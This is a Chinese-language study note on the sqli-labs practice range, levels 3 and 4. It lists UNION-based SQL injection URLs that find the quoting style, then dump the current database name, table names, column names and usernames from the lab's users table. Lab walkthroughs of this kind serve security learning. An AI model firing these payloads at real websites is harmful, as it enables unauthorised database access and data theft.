sqli-labs靶场3~4笔记

Less-3

1.测试是否存在注入点:

复制代码
http://sqli-labs/Less-3/?id=1'

可以看出是单引号+小括号闭合。

复制代码
http://sqli-labs/Less-3/?id=1')--+

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-3/?id=') union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-3/?id=') union select 1,2,database()--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(username) from security.users --+

Less-4

1.测试是否存在注入点:

是双引号+小括号闭合

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(username) from security.users --+

总结

前两关的差别也是注入类型的区别,Less-3是单引号+小括号型,Less-4是双引号+小括号型。

相关推荐
奋斗的小乌龟19 分钟前
动态创建Agent01
java·笔记
不会编程的懒洋洋1 小时前
VisionPro 中 图像预处理工具
图像处理·笔记·c#·视觉检测·visionpro
阳光宅男@李光熠2 小时前
【电子通识】贴片电阻上的丝印332、5R6、1502、01C怎么读出阻值?
笔记·学习
iCxhust2 小时前
AD0808调试笔记
笔记·单片机·嵌入式硬件·操作系统·微机原理·8088单板机
sakiko_4 小时前
Swift学习笔记31-网络请求
网络·笔记·学习·swift
夜雪闻竹4 小时前
nomic-embed-text vs text-embedding-3-small 横评
笔记·embedding
想七想八不如114085 小时前
目标检测笔记2
人工智能·笔记·目标检测
nkwshuyi5 小时前
如何用 AI 帮你自动构建卡片笔记盒?
人工智能·笔记
玄米乌龙茶1236 小时前
LLM成长笔记(八):Agent 智能体开发
笔记
心中有国也有家7 小时前
ascend-boost-comm:一次写完,到处复用——算子公共平台的 M×N 哲学
人工智能·经验分享·笔记·分布式·算法